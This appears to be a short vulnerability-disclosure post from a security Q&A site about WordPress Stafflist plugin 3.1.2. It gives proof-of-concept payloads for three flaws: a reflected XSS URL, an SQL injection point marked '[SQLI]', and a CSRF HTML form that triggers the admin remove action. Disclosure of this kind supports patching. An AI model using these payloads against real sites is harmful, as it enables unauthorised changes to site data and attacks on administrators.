Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

0 votes
WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability
by (277 points)

1 Answer

0 votes

WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

 

POC:

http://localhost/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&search=[SQLI]

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability

POC:

<html>

  <body>

    <form action="http://localhost/wp-admin/admin.php">

      <input type="hidden" name="page" value="stafflist" />

      <input type="hidden" name="remove" value="1" />

      <input type="hidden" name="p" value="1" />

      <input type="hidden" name="s" value="1" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

by (277 points)
...